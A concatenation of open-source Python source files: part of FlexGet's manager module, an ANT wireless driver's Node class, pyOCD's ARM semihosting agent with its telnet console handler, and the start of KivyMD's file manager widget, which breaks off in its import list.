os.dup2(si.fileno(), sys.stdin.fileno())
os.dup2(so.fileno(), sys.stdout.fileno())
os.dup2(se.fileno(), sys.stderr.fileno())
# If we have a lock, update the lock file with our new pid
if self._has_lock:
self.write_lock()
def db_cleanup(self, force: bool = False) -> None:
"""
Perform database cleanup if cleanup interval has been met.
Fires events:
* manager.db_cleanup
If interval was met. Gives session to do the cleanup as a parameter.
:param bool force: Run the cleanup no matter whether the interval has been met.
"""
expired = (
self.persist.get('last_cleanup', datetime(1900, 1, 1))
< datetime.now() - DB_CLEANUP_INTERVAL
)
if force or expired:
logger.info('Running database cleanup.')
with Session() as session:
fire_event('manager.db_cleanup', self, session)
# Try to VACUUM after cleanup
fire_event('manager.db_vacuum', self)
# Just in case some plugin was overzealous in its cleaning, mark the config changed
self.config_changed()
self.persist['last_cleanup'] = datetime.now()
else:
logger.debug('Not running db cleanup, last run {}', self.persist.get('last_cleanup'))
def shutdown(self, finish_queue: bool = True) -> None:
"""
Request manager shutdown.
:param bool finish_queue: Should scheduler finish the task queue
"""
if not self.initialized:
raise RuntimeError('Cannot shutdown manager that was never initialized.')
fire_event('manager.shutdown_requested', self)
self.task_queue.shutdown(finish_queue)
def _shutdown(self) -> None:
"""Runs when the manager is done processing everything."""
if self.ipc_server:
self.ipc_server.shutdown()
fire_event('manager.shutdown', self)
if not self.unit_test: # don't scroll "nosetests" summary results when logging is enabled
logger.debug('Shutting down')
self.engine.dispose()
# remove temporary database used in test mode
if self.options.test:
if 'test' not in self.db_filename:
raise Exception('trying to delete non test database?')
if self._has_lock:
os.remove(self.db_filename)
logger.info('Removed test database')
global manager
manager = None
def crash_report(self) -> str:
"""
This should be called when handling an unexpected exception. Will create a new log file containing the last 50
debug messages as well as the crash traceback.
"""
if not self.unit_test:
log_dir = os.path.dirname(self.log_filename)
filename = os.path.join(
log_dir, datetime.now().strftime('crash_report.%Y.%m.%d.%H%M%S%f.log')
)
with codecs.open(filename, 'w', encoding='utf-8') as outfile:
outfile.writelines(flexget.log.debug_buffer)
traceback.print_exc(file=outfile)
logger.critical(
'An unexpected crash has occurred. Writing crash report to {}. '
'Please verify you are running the latest version of flexget by using "flexget -V" '
'from CLI or by using version_checker plugin'
' at http://flexget.com/wiki/Plugins/version_checker. '
'You are currently using version {}',
filename,
get_current_flexget_version(),
)
logger.opt(exception=True).debug('Traceback:')
return traceback.format_exc()
|
node.py
|
# Ant
#
# Copyright (c) 2012, Gustav Tiger <gustav@tiger.name>
#
# Permission is hereby granted, free of charge, to any person obtaining a
# copy of this software and associated documentation files (the "Software"),
# to deal in the Software without restriction, including without limitation
# the rights to use, copy, modify, merge, publish, distribute, sublicense,
# and/or sell copies of the Software, and to permit persons to whom the
# Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in
# all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING
# FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER
# DEALINGS IN THE SOFTWARE.
import collections
import threading
import logging
try:
# Python 3
import queue
except ImportError:
# Python 2
import Queue as queue
from ant.base.ant import Ant
from ant.base.message import Message
from ant.easy.channel import Channel
from ant.easy.filter import wait_for_event, wait_for_response, wait_for_special
_logger = logging.getLogger("ant.easy.node")
class Node:
def __init__(self):
self._responses_cond = threading.Condition()
self._responses = collections.deque()
self._event_cond = threading.Condition()
self._events = collections.deque()
self._main_thread = None
self._datas = queue.Queue()
self.ant = Ant()
self._running = True
self._worker_thread = threading.Thread(target=self._worker, name="ant.easy")
self._worker_thread.start()
self.capabilities = self.get_capabilities()
self.channels = [None]*self.capabilities["max_channels"]
def new_channel(self, ctype, network_number=0x00, ext_assign=None):
for i in range(len(self.channels)):
if self.channels[i] is None:
channel = Channel(i, self, self.ant)
self.channels[i] = channel
channel._assign(ctype, network_number, ext_assign)
return channel
_logger.debug("No free channel available")
return None
def remove_channel(self, channel_id):
for i in range(len(self.channels)):
try:
if self.channels[i].id == channel_id:
self.channels[i].close()
self.channels[i]._unassign()
self.channels[i] = None
except:
pass
def get_capabilities(self):
data = self.request_message(Message.ID.RESPONSE_CAPABILITIES)
if data[1] == Message.ID.RESPONSE_CAPABILITIES:
#The Standard Options bit field is encoded as follows:
# Bit 0 - CAPABILITIES_NO_RECEIVE_CHANNELS
# Bit 1 - CAPABILITIES_NO_TRANSMIT_CHANNELS
# Bit 2 - CAPABILITIES_NO_RECEIVE_MESSAGES
# Bit 3 - CAPABILITIES_NO_TRANSMIT_MESSAGES
# Bit 4 - CAPABILITIES_NO_ACKD_MESSAGES
# Bit 5 - CAPABILITIES_NO_BURST_MESSAGES
# Other bits are reserved
#The Advanced Options bit field is encoded as follows:
# Bit 1 - CAPABILITIES_NETWORK_ENABLED
# Bit 3 - CAPABILITIES_SERIAL_NUMBER_ENABLED
# Bit 4 - CAPABILITIES_PER_CHANNEL_TX_POWER_ENABLED
# Bit 5 - CAPABILITIES_LOW_PRIORITY_SEARCH_ENABLED
# Bit 6 - CAPABILITIES_SCRIPT_ENABLED
# Bit 7 - CAPABILITIES_SEARCH_LIST_ENABLED
# Other bits are reserved
#The Advanced Options 2 bit field is encoded as follows:
# Bit 0 - CAPABILITIES_LED_ENABLED
# Bit 1 - CAPABILITIES_EXT_MESSAGE_ENABLED
# Bit 2 - CAPABILITIES_SCAN_MODE_ENABLED
# Bit 3 - Reserved
# Bit 4 - CAPABILITIES_PROX_SEARCH_ENABLED
# Bit 5 - CAPABILITIES_EXT_ASSIGN_ENABLED
# Bit 6 - CAPABILITIES_FS_ANTFS_ENABLED
# Bit 7 - CAPABILITIES_FIT1_ENABLED
# Other bits are reserved
#The Advanced Options 3 bit field is encoded as follows:
# Bit 0 - CAPABILITIES_ADVANCED_BURST_ENABLED
# Bit 1 - CAPABILITIES_EVENT_BUFFERING_ENABLED
# Bit 2 - CAPABILITIES_EVENT_FILTERING_ENABLED
# Bit 3 - CAPABILITIES_HIGH_DUTY_SEARCH_ENABLED
# Bit 4 - CAPABILITIES_SEARCH_SHARING_ENABLED
# Bit 5 - Reserved.
# Bit 6 - CAPABILITIES_SELECTIVE_DATA_UPDATES_ENABLED
# Bit 7 - CAPABILITIES_ENCRYPTED_CHANNEL_ENABLED
#The Advanced Options 4 bit field is encoded as follows:
# Bit 0 - CAPABILITIES_RFACTIVE_NOTIFICATION_ENABLED
# Other bits are reserved
result = {
"max_channels" : data[2][0],
"max_networks" : data[2][1],
"standard_options" : data[2][2],
"advanced_options" : data[2][3],
"advanced_options2" : data[2][4],
"max_sensrcore_channels": data[2][5],
}
if len(data[2])>=7:
result["advanced_options3"] = data[2][6]
if len(data[2])>=8:
result["advanced_options4"] = data[2][7]
return result
else:
_logger.debug(
"capabilities requested but not received (message id 0x{:02x}, but should be 0x{:02x})".format(data[1], Message.ID.RESPONSE_CAPABILITIES))
return
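# Illustrative sketch (not part of the driver): the bit positions documented above can
# be tested directly against the returned dict. For example, bit 5 of the standard
# options byte is CAPABILITIES_NO_BURST_MESSAGES:
#
#   caps = node.get_capabilities()
#   no_burst = bool(caps["standard_options"] & (1 << 5))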
def request_message(self, messageId):
_logger.debug("requesting message %#02x", messageId)
self.ant.request_message(0, messageId)
_logger.debug("done requesting message %#02x", messageId)
return self.wait_for_special(messageId)
def set_network_key(self, network, key):
self.ant.set_network_key(network, key)
return self.wait_for_response(Message.ID.SET_NETWORK_KEY)
def wait_for_event(self, ok_codes):
return wait_for_event(ok_codes, self._events, self._event_cond)
def wait_for_response(self, event_id):
return wait_for_response(event_id, self._responses, self._responses_cond)
def wait_for_special(self, event_id):
return wait_for_special(event_id, self._responses, self._responses_cond)
def _worker_response(self, channel, event, data):
self._responses_cond.acquire()
self._responses.append((channel, event, data))
self._responses_cond.notify()
self._responses_cond.release()
def _worker_event(self, channel, event, data):
if event == Message.Code.EVENT_RX_BURST_PACKET:
self._datas.put(("burst", channel, data))
elif event == Message.Code.EVENT_RX_BROADCAST:
self._datas.put(("broadcast", channel, data))
elif event == Message.Code.EVENT_TX:
self._datas.put(("broadcast_tx", channel, data))
elif event == Message.Code.EVENT_RX_ACKNOWLEDGED:
self._datas.put(("acknowledge", channel, data))
else:
self._event_cond.acquire()
self._events.append((channel, event, data))
self._event_cond.notify()
self._event_cond.release()
def _worker(self):
self.ant.response_function = self._worker_response
self.ant.channel_event_function = self._worker_event
# TODO: check capabilities
self.ant.start()
def _main(self):
while self._running:
try:
(data_type, channel, data) = self._datas.get(True, 1.0)
self._datas.task_done()
if data_type == "broadcast":
self.channels[channel].on_broadcast_data(data)
elif data_type == "burst":
self.channels[channel].on_burst_data(data)
elif data_type == "broadcast_tx":
self.channels[channel].on_broadcast_tx_data(data)
elif data_type == "acknowledge":
self.channels[channel].on_acknowledge_data(data)
else:
_logger.warning("Unknown data type '%s': %r", data_type, data)
except queue.Empty:
pass
def start(self):
self._main_thread = threading.Thread(target=self._main, name="_main")
self._main_thread.start()
def stop(self):
if self._running:
_logger.debug("Stoping ant.easy")
self._running = False
self.ant.stop()
self._worker_thread.join()
self._main_thread.join()
self._main_thread = None
|
semihost.py
|
"""
mbed CMSIS-DAP debugger
Copyright (c) 2015 ARM Limited
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import os
import sys
import io
import logging
import time
import datetime
import threading
import socket
import traceback
import pyOCD
from ..gdbserver.gdb_socket import GDBSocket
from ..gdbserver.gdb_websocket import GDBWebSocket
from pyOCD.pyDAPAccess import DAPAccess
# Debug logging options
LOG_SEMIHOST = True
## bkpt #0xab instruction
BKPT_INSTR = 0xbeab
# ARM semihosting request numbers.
TARGET_SYS_OPEN = 0x01
TARGET_SYS_CLOSE = 0x02
TARGET_SYS_WRITEC = 0x03
TARGET_SYS_WRITE0 = 0x04
TARGET_SYS_WRITE = 0x05
TARGET_SYS_READ = 0x06
TARGET_SYS_READC = 0x07
TARGET_SYS_ISERROR = 0x08
TARGET_SYS_ISTTY = 0x09
TARGET_SYS_SEEK = 0x0a
TARGET_SYS_FLEN = 0x0c
TARGET_SYS_TMPNAM = 0x0d
TARGET_SYS_REMOVE = 0x0e
TARGET_SYS_RENAME = 0x0f
TARGET_SYS_CLOCK = 0x10
TARGET_SYS_TIME = 0x11
TARGET_SYS_SYSTEM = 0x12
TARGET_SYS_ERRNO = 0x13
TARGET_SYS_GET_CMDLINE = 0x15
TARGET_SYS_HEAPINFO = 0x16
angel_SWIreason_EnterSVC = 0x17
TARGET_SYS_EXIT = 0x18 # Also called angel_SWIreason_ReportException
TARGET_SYS_ELAPSED = 0x30
TARGET_SYS_TICKFREQ = 0x31
# Pseudo-file descriptor numbers. The fds must be non-zero according to the
# ARM semihosting spec.
STDIN_FD = 1
STDOUT_FD = 2
STDERR_FD = 3
## Maximum length of a null-terminated string we'll attempt to read from target memory.
#
# The length is limited in case the string isn't terminated.
#
# @see SemihostAgent::_get_string()
MAX_STRING_LENGTH = 2048
##
# @brief Interface for semihosting file I/O handlers.
#
# This class is also used as the default I/O handler if none is provided to SemihostAgent.
# In this case, all file I/O requests are rejected.
class SemihostIOHandler(object):
def __init__(self):
self.agent = None
self._errno = 0
def cleanup(self):
pass
@property
def errno(self):
return self._errno
## @brief Helper for standard I/O open requests.
#
# In the ARM semihosting spec, standard I/O files are opened using a filename of ":tt"
# with the open mode specifying which standard I/O file to open. This method takes care
# of these special open requests, and is intended to be used by concrete I/O handler
# subclasses.
#
# @return A 2-tuple of the file descriptor and filename. The filename is returned so it
# only has to be read from target memory once if the request is not for standard I/O.
# The returned file descriptor may be one of 0, 1, or 2 for the standard I/O files,
# -1 if an invalid combination was requested, or None if the request was not for
# a standard I/O file (i.e., the filename was not ":tt"). If None is returned for the
# file descriptor, the caller must handle the open request.
def _std_open(self, fnptr, fnlen, mode):
filename = self.agent._get_string(fnptr, fnlen)
logging.debug("Semihost: open '%s' mode %s", filename, mode)
# Handle standard I/O.
if filename == ':tt':
if mode == 'r':
fd = STDIN_FD
elif mode == 'w':
fd = STDOUT_FD
elif mode == 'a':
fd = STDERR_FD
else:
logging.warning("Unrecognized semihosting console open file combination: mode=%s", mode)
return -1, filename
return fd, filename
return None, filename
def open(self, fnptr, fnlen, mode):
raise NotImplementedError()
def close(self, fd):
raise NotImplementedError()
def write(self, fd, ptr, length):
raise NotImplementedError()
def read(self, fd, ptr, length):
raise NotImplementedError()
def readc(self):
raise NotImplementedError()
def istty(self, fd):
raise NotImplementedError()
def seek(self, fd, pos):
raise NotImplementedError()
def flen(self, fd):
raise NotImplementedError()
def remove(self, ptr, length):
raise NotImplementedError()
def rename(self, oldptr, oldlength, newptr, newlength):
raise NotImplementedError()
##
# @brief Implements semihosting requests directly in the Python process.
#
# This class maintains its own list of pseudo-file descriptors for files opened by the
# debug target. By default, this class uses the system stdin, stdout, and stderr file objects
# for file descriptors 1, 2, and 3.
class InternalSemihostIOHandler(SemihostIOHandler):
def __init__(self):
super(InternalSemihostIOHandler, self).__init__()
self.next_fd = STDERR_FD + 1
# Go ahead and connect standard I/O.
self.open_files = {
STDIN_FD : sys.stdin,
STDOUT_FD : sys.stdout,
STDERR_FD : sys.stderr
}
def _is_valid_fd(self, fd):
return fd in self.open_files and self.open_files[fd] is not None
def cleanup(self):
for f in (self.open_files[k] for k in self.open_files if k > STDERR_FD):
f.close()
def open(self, fnptr, fnlen, mode):
fd, filename = self._std_open(fnptr, fnlen, mode)
if fd is not None:
return fd
try:
fd = self.next_fd
self.next_fd += 1
f = io.open(filename, mode)
self.open_files[fd] = f
return fd
except IOError as e:
self._errno = e.errno
logging.error("Semihost: failed to open file '%s'", filename)
traceback.print_exc()
return -1
def close(self, fd):
if fd > STDERR_FD:
if not self._is_valid_fd(fd):
return -1
f = self.open_files.pop(fd)
try:
f.close()
except OSError:
# Ignore errors closing files.
pass
return 0
def write(self, fd, ptr, length):
if not self._is_valid_fd(fd):
# Return byte count not written.
return length
data = self.agent._get_string(ptr, length)
try:
f = self.open_files[fd]
if 'b' not in f.mode:
data = unicode(data)
f.write(data)
f.flush()
return 0
except IOError as e:
self._errno = e.errno
logging.debug("Semihost: exception: %s", e)
return -1
def read(self, fd, ptr, length):
if not self._is_valid_fd(fd):
# Return byte count not read.
return length
try:
f = self.open_files[fd]
data = f.read(length)
if 'b' not in f.mode:
data = data.encode()
except IOError as e:
self._errno = e.errno
logging.debug("Semihost: exception: %s", e)
return -1
data = bytearray(data)
self.agent.target.writeBlockMemoryUnaligned8(ptr, data)
return length - len(data)
def readc(self):
try:
f = self.open_files[STDIN_FD]
if f is not None:
data = f.read(1)
if 'b' not in f.mode:
data = data.encode()
return data
else:
return 0
except OSError as e:
self._errno = e.errno
return 0
def istty(self, fd):
if not self._is_valid_fd(fd):
return -1
# Just assume that stdio is a terminal and other files aren't.
return int(not fd > STDERR_FD)
def seek(self, fd, pos):
if not self._is_valid_fd(fd):
return -1
try:
self.open_files[fd].seek(pos)
return 0
except IOError as e:
self._errno = e.errno
return -1
def flen(self, fd):
if not self._is_valid_fd(fd):
return -1
try:
info = os.fstat(self.open_files[fd].fileno())
return info.st_size
except OSError as e:
self._errno = e.errno
return -1
##
# @brief Serves a telnet connection for semihosting.
#
# Not all semihost requests are supported. This class is meant to be used only for the
# debug console. Pass an instance for the @i console parameter of the SemihostAgent
# constructor.
#
# The server thread will automatically be started by the constructor. To shut down the
# server and its thread, call the stop() method.
class TelnetSemihostIOHandler(SemihostIOHandler):
def __init__(self, port_or_url, serve_local_only=True):
super(TelnetSemihostIOHandler, self).__init__()
self._abstract_socket = None
self._wss_server = None
self._port = 0
if isinstance(port_or_url, str):
self._wss_server = port_or_url
self._abstract_socket = GDBWebSocket(self._wss_server)
else:
self._port = port_or_url
self._abstract_socket = GDBSocket(self._port, 4096)
if serve_local_only:
self._abstract_socket.host = 'localhost'
self._buffer = bytearray()
self._buffer_lock = threading.Lock()
self.connected = None
self._shutdown_event = threading.Event()
self._thread = threading.Thread(target=self._server, name="semihost-telnet")
self._thread.daemon = True
self._thread.start()
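# Usage sketch (assumed, not taken from pyOCD): pass an instance as the 'console'
# parameter of SemihostAgent so standard I/O and debug console requests are served
# over a telnet connection, e.g.:
#
#   console = TelnetSemihostIOHandler(4444)
#   agent = SemihostAgent(target, io_handler=InternalSemihostIOHandler(), console=console)
#   ...
#   console.stop()   # shuts down the server thread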
def stop(self):
self._shutdown_event.set()
self._thread.join()
def _server(self):
logging.info("Telnet: server started on port %s", str(self._port))
self.connected = None
try:
while not self._shutdown_event.is_set():
# Wait for a client to connect.
# TODO support multiple client connections
while not self._shutdown_event.is_set():
self.connected = self._abstract_socket.connect()
if self.connected is not None:
logging.debug("Telnet: client connected")
break
if self._shutdown_event.is_set():
break
# Set timeout on new connection.
self._abstract_socket.setTimeout(0.1)
# Keep reading from the client until we either get a shutdown event, or
# the client disconnects. The incoming data is appended to our read buffer.
while not self._shutdown_event.is_set():
try:
data = self._abstract_socket.read()
if len(data) == 0:
# Client disconnected.
self._abstract_socket.close()
self.connected = None
break
self._buffer_lock.acquire()
self._buffer += bytearray(data)
self._buffer_lock.release()
except socket.timeout:
pass
finally:
self._abstract_socket.close()
logging.info("Telnet: server stopped")
def write(self, fd, ptr, length):
# If nobody is connected, act like all data was written anyway.
if self.connected is None:
return 0
data = self.agent._get_string(ptr, length)
remaining = len(data)
while remaining:
count = self._abstract_socket.write(data)
remaining -= count
if remaining:
data = data[count:]
return 0
## @brief Extract requested amount of data from the read buffer.
def _get_input(self, length):
self._buffer_lock.acquire()
try:
actualLength = min(length, len(self._buffer))
if actualLength:
data = self._buffer[:actualLength]
self._buffer = self._buffer[actualLength:]
else:
data = bytearray()
return data
finally:
self._buffer_lock.release()
def read(self, fd, ptr, length):
if self.connected is None:
return -1
# Extract requested amount of data from the read buffer.
data = self._get_input(length)
# Stuff data into provided buffer.
if data:
self.agent.target.writeBlockMemoryUnaligned8(ptr, data)
result = length - len(data)
if not data:
self._errno = 5
return -1
return result
def readc(self):
if self.connected is None:
return -1
data = self._get_input(1)
if data:
return data[0]
else:
return -1
##
# @brief Handler for ARM semihosting requests.
#
# Semihosting requests are made by the target by executing a 'bkpt #0xab' instruction. The
# requested operation is specified by R0 and any arguments by R1. Many requests use a block
# of word-sized arguments pointed to by R1. The return value is passed back to the target
# in R0.
#
# This class does not handle any file-related requests by itself. It uses I/O handler objects
# passed in to the constructor. The requests handled directly by this class are #TARGET_SYS_CLOCK
# and #TARGET_SYS_TIME.
#
# There are two types of I/O handlers used by this class. The main I/O handler, set
# with the constructor's @i io_handler parameter, is used for most file operations.
# You may optionally pass another I/O handler for the @i console constructor parameter. The
# console handler is used solely for standard I/O and debug console I/O requests. If no console
# handler is provided, the main handler is used instead. TARGET_SYS_OPEN requests are never
# passed to the console handler; they are always passed to the main handler.
#
# If no main I/O handler is provided, the class will use SemihostIOHandler, which causes all
# file I/O requests to be rejected as an error.
#
# The SemihostAgent assumes standard I/O file descriptor numbers are #STDIN_FD, #STDOUT_FD,
# and #STDERR_FD. When it receives a read or write request for one of these descriptors, it
# passes the request to the console handler. This means the main handler must return these
# numbers for standard I/O open requests (those with a file name of ":tt").
#
# Not all semihosting requests are supported. Those that are not implemented are:
# - TARGET_SYS_TMPNAM
# - TARGET_SYS_SYSTEM
# - TARGET_SYS_GET_CMDLINE
# - TARGET_SYS_HEAPINFO
# - TARGET_SYS_EXIT
# - TARGET_SYS_ELAPSED
# - TARGET_SYS_TICKFREQ
class SemihostAgent(object):
## Index into this array is the file open mode argument to TARGET_SYS_OPEN.
OPEN_MODES = ['r', 'rb', 'r+', 'r+b', 'w', 'wb', 'w+', 'w+b', 'a', 'ab', 'a+', 'a+b']
EPOCH = datetime.datetime(1970, 1, 1)
def __init__(self, target, io_handler=None, console=None):
self.target = target
self.start_time = time.time()
self.io_handler = io_handler or SemihostIOHandler()
self.io_handler.agent = self
self.console = console or self.io_handler
self.console.agent = self
self.request_map = {
TARGET_SYS_OPEN : self.handle_sys_open,
TARGET_SYS_CLOSE : self.handle_sys_close,
TARGET_SYS_WRITEC : self.handle_sys_writec,
TARGET_SYS_WRITE0 : self.handle_sys_write0,
TARGET_SYS_WRITE : self.handle_sys_write,
TARGET_SYS_READ : self.handle_sys_read,
TARGET_SYS_READC : self.handle_sys_readc,
TARGET_SYS_ISERROR : self.handle_sys_iserror,
TARGET_SYS_ISTTY : self.handle_sys_istty,
TARGET_SYS_SEEK : self.handle_sys_seek,
TARGET_SYS_FLEN : self.handle_sys_flen,
TARGET_SYS_TMPNAM : self.handle_sys_tmpnam,
TARGET_SYS_REMOVE : self.handle_sys_remove,
TARGET_SYS_RENAME : self.handle_sys_rename,
TARGET_SYS_CLOCK : self.handle_sys_clock,
TARGET_SYS_TIME : self.handle_sys_time,
TARGET_SYS_SYSTEM : self.handle_sys_system,
TARGET_SYS_ERRNO : self.handle_sys_errno,
TARGET_SYS_GET_CMDLINE : self.handle_sys_get_cmdline,
TARGET_SYS_HEAPINFO : self.handle_sys_heapinfo,
TARGET_SYS_EXIT : self.handle_sys_exit,
TARGET_SYS_ELAPSED : self.handle_sys_elapsed,
TARGET_SYS_TICKFREQ : self.handle_sys_tickfreq
}
## @brief Handle a semihosting request.
#
# This method should be called after the target has halted, to check if the halt was
# due to a semihosting request. It first checks to see if the target halted because
# of a breakpoint. If so, it reads the instruction at PC to make sure it is a 'bkpt #0xAB'
# instruction. If so, the target is making a semihosting request. If not, nothing more is done.
#
# After the request is handled, the PC is advanced to the next instruction after the 'bkpt'.
# A boolean is returned indicating whether a semihosting request was handled. If True, the
# caller should resume the target immediately.
#
# @retval True A semihosting request was handled.
# @retval False The target halted for a reason other than semihosting, i.e. a user-installed
# debugging breakpoint.
def check_and_handle_semihost_request(self):
# Nothing to do if this is not a bkpt.
if (self.target.read32(pyOCD.coresight.cortex_m.CortexM.DFSR) &
pyOCD.coresight.cortex_m.CortexM.DFSR_BKPT) == 0:
return False
pc = self.target.readCoreRegister('pc')
# Are we stopped due to one of our own breakpoints?
bp = self.target.findBreakpoint(pc)
if bp:
return False
# Get the instruction at the breakpoint.
instr = self.target.read16(pc)
# Check for semihost bkpt.
if instr != BKPT_INSTR:
return False
# Advance PC beyond the bkpt instruction.
self.target.writeCoreRegister('pc', pc + 2)
# Get args
op = self.target.readCoreRegister('r0')
args = self.target.readCoreRegister('r1')
# Handle request
handler = self.request_map.get(op, None)
if handler:
try:
result = handler(args)
except NotImplementedError:
logging.warning("Semihost: unimplemented request pc=%x r0=%x r1=%x", pc, op, args)
result = -1
except Exception as e:
logging.warning("Exception while handling semihost request: %s", e)
traceback.print_exc()
result = -1
else:
result = -1
# Set return value.
self.target.writeCoreRegister('r0', result)
return True
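# Illustrative sketch (not from pyOCD itself): a debugger's halt handler would
# typically call this method after every halt and resume the target when a request
# was serviced, along the lines of:
#
#   agent = SemihostAgent(target, io_handler=InternalSemihostIOHandler())
#   ...
#   if agent.check_and_handle_semihost_request():
#       target.resume()   # 'resume' is assumed here to be the target's resume call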
## @brief Clean up any resources allocated by semihost requests.
#
# @note May be called more than once.
def cleanup(self):
self.io_handler.cleanup()
if self.console is not self.io_handler:
self.console.cleanup()
def _get_args(self, args, count):
args = self.target.readBlockMemoryAligned32(args, count)
if count == 1:
return args[0]
else:
return args
def _get_string(self, ptr, length=None):
if length is not None:
data = self.target.readBlockMemoryUnaligned8(ptr, length)
return str(bytearray(data))
target_str = ''
# TODO - use memory map to make sure we don't try to read off the end of memory
# Limit string size in case it isn't terminated.
while len(target_str) < MAX_STRING_LENGTH:
try:
# Read 32 bytes at a time for efficiency.
data = self.target.readBlockMemoryUnaligned8(ptr, 32)
terminator = data.index(0)
# Found a null terminator, append data up to but not including the null
# and then exit the loop.
target_str += str(bytearray(data[:terminator]))
break
except DAPAccess.TransferError:
# Failed to read some or all of the string.
break
except ValueError:
# No null terminator was found. Append all of data.
target_str += str(bytearray(data))
ptr += 32
return target_str
def handle_sys_open(self, args):
fnptr, mode, fnlen = self._get_args(args, 3)
if mode >= len(self.OPEN_MODES):
return -1
mode = self.OPEN_MODES[mode]
if LOG_SEMIHOST:
logging.debug("Semihost: open %x/%x, mode %s", fnptr, fnlen, mode)
return self.io_handler.open(fnptr, fnlen, mode)
def handle_sys_close(self, args):
fd = self._get_args(args, 1)
if LOG_SEMIHOST:
logging.debug("Semihost: close fd=%d", fd)
return self.io_handler.close(fd)
def handle_sys_writec(self, args):
if LOG_SEMIHOST:
logging.debug("Semihost: writec %x", args)
return self.console.write(STDOUT_FD, args, 1)
def handle_sys_write0(self, args):
msg = self._get_string(args)
if LOG_SEMIHOST:
logging.debug("Semihost: write0 msg='%s'", msg)
return self.console.write(STDOUT_FD, args, len(msg))
def handle_sys_write(self, args):
fd, data_ptr, length = self._get_args(args, 3)
if LOG_SEMIHOST:
logging.debug("Semihost: write fd=%d ptr=%x len=%d", fd, data_ptr, length)
if fd in (STDOUT_FD, STDERR_FD):
return self.console.write(fd, data_ptr, length)
else:
return self.io_handler.write(fd, data_ptr, length)
def handle_sys_read(self, args):
fd, ptr, length = self._get_args(args, 3)
if LOG_SEMIHOST:
logging.debug("Semihost: read fd=%d ptr=%x len=%d", fd, ptr, length)
if fd == STDIN_FD:
return self.console.read(fd, ptr, length)
else:
return self.io_handler.read(fd, ptr, length)
def handle_sys_readc(self, args):
if LOG_SEMIHOST:
logging.debug("Semihost: readc")
return self.console.readc()
def handle_sys_iserror(self, args):
raise NotImplementedError()
def handle_sys_istty(self, args):
fd = self._get_args(args, 1)
if LOG_SEMIHOST:
logging.debug("Semihost: istty fd=%d", fd)
return self.io_handler.istty(fd)
def handle_sys_seek(self, args):
fd, pos = self._get_args(args, 2)
if LOG_SEMIHOST:
logging.debug("Semihost: seek fd=%d pos=%d", fd, pos)
return self.io_handler.seek(fd, pos)
def handle_sys_flen(self, args):
fd = self._get_args(args, 1)
if LOG_SEMIHOST:
logging.debug("Semihost: flen fd=%d", fd)
return self.io_handler.flen(fd)
def handle_sys_tmpnam(self, args):
raise NotImplementedError()
def handle_sys_remove(self, args):
ptr, length = self._get_args(args, 2)
return self.io_handler.remove(ptr, length)
def handle_sys_rename(self, args):
oldptr, oldlength, newptr, newlength = self._get_args(args, 4)
return self.io_handler.rename(oldptr, oldlength, newptr, newlength)
def handle_sys_clock(self, args):
now = time.time()
delta = now - self.start_time
return int(delta * 100)
def handle_sys_time(self, args):
now = datetime.datetime.now()
delta = now - self.EPOCH
seconds = (delta.days * 86400) + delta.seconds
return seconds
def handle_sys_system(self, args):
raise NotImplementedError()
def handle_sys_errno(self, args):
return self.io_handler.errno
def handle_sys_get_cmdline(self, args):
raise NotImplementedError()
def handle_sys_heapinfo(self, args):
raise NotImplementedError()
def handle_sys_exit(self, args):
raise NotImplementedError()
def handle_sys_elapsed(self, args):
raise NotImplementedError()
def handle_sys_tickfreq(self, args):
raise NotImplementedError()
|
filemanager.py
|
"""
File Manager
============
Copyright (c) 2019 Ivanov Yuri
For suggestions and questions:
<kivydevelopment@gmail.com>
This file is distributed under the terms of the same license,
as the Kivy framework.
A simple manager for selecting directories and files.
Example
-------
from kivymd.app import MDApp
from kivy.core.window import Window
from kivy.lang import Builder
from kivy.factory import Factory
from kivy.uix.modalview import ModalView
from kivymd.uix.filemanager import MDFileManager
from kivymd.theming import ThemeManager
from kivymd.toast import toast
Builder.load_string('''
<ExampleFileManager@BoxLayout>
orientation: 'vertical'
spacing: dp(5)
MDToolbar:
id: toolbar
title: app.title
left_action_items: [['menu', lambda x: None]]
elevation: 10
md_bg_color: app.theme_cls.primary_color
FloatLayout:
MDRoundFlatIconButton:
text: "Open manager"
icon: "folder"
pos_hint: {'center_x': .5, 'center_y': .6}
on_release: app.file_manager_open()
''')
class Example(MDApp):
title = "File Manage"
def __init__(self, **kwargs):
super().__init__(**kwargs)
Window.bind(on_keyboard=self.events)
self.manager_open = False
self.manager = None
def build(self):
return Factory.ExampleFileManager()
def file_manager_open(self):
if not self.manager:
self.manager = ModalView(size_hint=(1, 1), auto_dismiss=False)
self.file_manager = MDFileManager(
exit_manager=self.exit_manager, select_path=self.select_path)
self.manager.add_widget(self.file_manager)
self.file_manager.show('/') # output manager to the screen
self.manager_open = True
self.manager.open()
def select_path(self, path):
'''It will be called when you click on the file name
or the catalog selection button.
:type path: str;
:param path: path to the selected directory or file;
'''
self.exit_manager()
toast(path)
def exit_manager(self, *args):
'''Called when the user reaches the root of the directory tree.'''
self.manager.dismiss()
self.manager_open = False
def events(self, instance, keyboard, keycode, text, modifiers):
'''Called when buttons are pressed on the mobile device.'''
if keyboard in (1001, 27):
if self.manager_open:
self.file_manager.back()
return True
Example().run()
"""
import os
import threading
from PIL import Image
from kivy.app import App
from kivy.metrics import dp
from kivy.uix.anchorlayout import AnchorLayout
from kivy.uix.behaviors import ButtonBehavior
from kivy.uix.boxlayout import BoxLayout
from kivy.uix.floatlayout import FloatLayout
from kivy.lang import Builder
from kivy.uix.image import AsyncImage
from kivy.properties import (
ObjectProperty,
StringProperty,
